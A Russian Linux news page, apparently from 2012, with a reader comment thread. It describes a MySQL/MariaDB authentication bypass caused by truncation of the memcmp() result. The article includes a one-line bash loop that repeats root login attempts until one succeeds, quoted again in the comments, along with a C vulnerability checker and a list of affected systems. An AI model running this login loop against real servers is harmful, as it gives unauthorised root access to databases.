Спонсор проекта:
Лучший вариант для анонимности купить прокси на выделенном сервере IPANN.NET.
Ads



Последние комментарии
#1
X_perienced пишет: » А какое именно оборудование там подерживается - го... (25.08.2017)
// Обзор и попытка установки МСВС 5.0
#2
Linups_Troolvalds пишет: » Хватит писать бред. МСВС (возможно) не работает на... (24.07.2017)
// Обзор и попытка установки МСВС 5.0
#3
watersoda пишет: » Да и RHEL под "Эльбрус" не помешал бы... (19.03.2017)
// Обзор и попытка установки МСВС 5.0
#4
watersoda пишет: » Небольшая поправка: ... через соответствующий паке... (19.03.2017)
// Обзор и попытка установки МСВС 5.0
#5
watersoda пишет: » Кстати, мелькала где-то информация, что Red Hat сд... (19.03.2017)
// Обзор и попытка установки МСВС 5.0
#6
watersoda пишет: »
Цитата:
... МСВС отстаёт от ДОСа по поддержке виде...
(16.03.2017)
// Обзор и попытка установки МСВС 5.0
#7
admin пишет: » watersoda, этот ноутбук выпущен в 2012 году wink
Убунт... (16.03.2017)
// Обзор и попытка установки МСВС 5.0
#8
watersoda пишет: » И вот ещё, правда речь про МСВС 3.0:
Цитата:
Устрои...
(08.03.2017)
// Обзор и попытка установки МСВС 5.0
#9
watersoda пишет: » Я где-то читал, что ВНИИНС предоставляет список об... (08.03.2017)
// Обзор и попытка установки МСВС 5.0
#10
дохтур пишет: »
Gentoo написал:
Вот мне лично нахуй не надо ни одн...
(02.02.2017)
// Письма неадекватов
#11
дохтур пишет: »
Gentoo написал:
Вот мне лично нахуй не надо ни одн...
(02.02.2017)
// Письма неадекватов
#12
Gentoo пишет: » >>Autocad, Kompas, CorelDraw, SolidWorks, AD... (30.01.2017)
// Письма неадекватов
#13
watersoda пишет: » Just for fun как он есть.biggrin (15.01.2017)
// Линукса нет! Нас обманули !!!
#14
дохтур пишет: » admin, ага, ещё вот проприетарная лицензия на обще... (13.01.2017)
// Письма неадекватов
#15
admin пишет: » дохтур, а ранили его "тупые виндузяги" с... (13.01.2017)
// Письма неадекватов
Quotes
Из курса диалектики кол-во должно постепенно переходить в качество. А кол-во дистрибутивов Линукс каждый день только увеличивается, а качества все нет

Смешная уязвимость в MySQL под Ubuntu 64-bit | автор: Luca | 11 июня 2012 |

Категория: Open Source

Суть в том, что при подключении пользователя MariaDB/MySQL вычисляется токен (SHA поверх пароля плюс хэш), который сравнивается с ожидаемым значением. При этом функция memcmp() должна возвращать значение в диапазоне -128..127, но на некоторых платформах (похоже, в glibc в Linux с оптимизацией под SSE) возвращаемое значение может выпадать из диапазона.

В итоге, в 1 случае из 256 процедура сравнения хэша с ожидаемым значением всегда возвращает значение true, независимо от хэша. Другими словами, система уязвима перед случайным паролем с вероятностью 1/256.


В итоге, простая команда на bash даёт злоумышленнику рутовый доступ к уязвимому серверу MySQL, даже если он не знает пароль.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

На данный момент дырка подтверждена в следующих конфигурациях:

Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
Debian Linux 64-bit (пока непонятно, в каких конкретно версиях)
Arch Linux (то же самое)

Официальные билды MySQL и MariaDB (включая Windows)
Red Hat Enterprise Linux, CentOS, Fedora Core (32-bit и 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, вероятно все)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24+lenny5
Debian Linux lenny 64-bit 5.0.51a-24+lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0+squeeze1
Debian Linux squeeze 64-bit 5.1.61-0+squeeze1

программа проверки на уязвимость:
#include <stdio.h>
#include <stdlib.h>

int main(void) {
int one, two, ret;
time_t start = time(0);
time_t now;

srand(getpid()*start);
while (1) {
one = rand();
two = rand();
ret = memcmp(&one, &two, sizeof(int));
if (ret < -128 || ret > 127)
break;
time(&now);
if (now - start > 10) {
printf("Not triggered in 10 seconds, *probably* not vulnerable..\n");
return 1;
}
}
printf("Vulnerable! memcmp returned: %d\n", ret);
return 0;
}

источник


Комментарии посетителей
Как же так?!

#2. linupzer

1. липукс это йадро, так что мимо тазика
2. используйте постгрес
tongue

#3. beep

linupzer, а какже это все будет работать без ядра ?

#4. nixadmin

у меня как всегда не работают уязвимости.

RF Remix 16.1 Verne (x86_64)

mysql-5.5.23-1.fc16
glibc-2.14.90-24.fc16.7

А по теме: безопасность - не продукт а услуга, важно как быстро убунтовцы и дебианщики закроют обнаруженную уязвимость

#5. pavel2403

pavel2403
nixadmin написал:
безопасность - не продукт а услуга,
Безопасность -это не продукт и не услуга, это процесс! /Fixed
Так что? Линукс.. нинужен? ОМГ!! cool
Подтверждаю, баг наблюдается. MySQL 5.5.22, ubuntu 11.10.

Цитата:
При этом функция memcmp() должна возвращать значение в диапазоне -128..127

По стандарту memcmp должна возвращать int, который равен, меньше или больше нуля. Поведение функции вполне корректно. Ошибка была в MySQL. Дело в том, что проверяющая пароль функция была определена как доставляющая значение типа my_bool, основанного на char, но фактически возвращала результат memcmp, и происходило присваивание с усечением.

#8. dex

По стандарту memcmp должна возвращать int, который равен, меньше или больше нуля. Поведение функции вполне корректно. Ошибка была в MySQL. Дело в том, что проверяющая пароль функция была определена как доставляющая значение типа my_bool, основанного на char, но фактически возвращала результат memcmp, и происходило присваивание с усечением.,

Ну и зачем ты это выложил, местные тру иксперты- на техпортале закапывателей ГовноОси то все равно не поймут ничего из того что ты написал ;)

#9. NEMO

dex написал:
Ну и зачем ты это выложил, местные тру иксперты- на техпортале закапывателей ГовноОси то все равно не поймут ничего из того что ты написал ;)

Мне все понятно. Убейтесь.

#10. Павел

Так в Ubuntu уже вчера упал update.

#11. beep

Павел, с кем не бывает
из релиза написал:
В итоге, в 1 случае из 256 процедура сравнения хэша с ожидаемым значением всегда возвращает значение true, независимо от хэша. Другими словами, система уязвима перед случайным паролем с вероятностью 1/256.

В итоге, простая команда на bash даёт злоумышленнику рутовый доступ к уязвимому серверу MySQL, даже если он не знает пароль.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
,пипец,ты Пиндосию открыл,давно уже известно что все атаки делаются на линь-сервера и управляют атаками ток под линь-серверами ибо под виндой такая вакханалия недопустима(и чем больше кричат о Щвабодке тем больше серваков под бамбук становится,по ходу теория такая чем больше глюков и криков тем проще и заразней)biggrin Подождем лунатика с Аполона (у которого 3-и сервера на Луне и который в других OS даже IP адрес прописать не может,зато ботвы накидает и перейдет на личное,у лунА-ходов на личное это как я понял как здорово живешь и обоср#ть всех,прикольно меньше 1,5% пытается чет сделать,короче это секта-предлогаю запретить линукс в школах,пожалейте детей.)
biggrin

#14. Saturn

supermambet написал:
короче это секта-предлогаю запретить линукс в школах,пожалейте детей.)

У тебя что в школе линукс? И тебя учитель информатики замучил? Так лучше иди учись, чем на форумах ср#ть.

#15. KaeSkat

supermambet написал:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

supermambet, Что-то команда сильно напоминает анекдот про миллиард китайцев и сервер пентагона. В натуре клоуны...
Saturn написал:
У тебя что в школе линукс? И тебя учитель информатики замучил? Так лучше иди учись, чем на форумах ср#ть
поверь мне Сириус у меня даже информатики не было в школе,просто такой предмет позже появился.У тебя по ходу была информатика и ты ее тестами сдал на отлично.biggrin Я рад что меня школота за однокашника принимает.
KaeSkat написал:
supermambet, Что-то команда сильно напоминает анекдот про миллиард китайцев и сервер пентагона. В натуре клоуны...
up ,я ее из релиза скопировал,за сущность строки и ее ценность не могу сказать,хотя есть Сириус и видать он в школе отличником был(можно и у него поинтересоваться).
Просмотров: 10620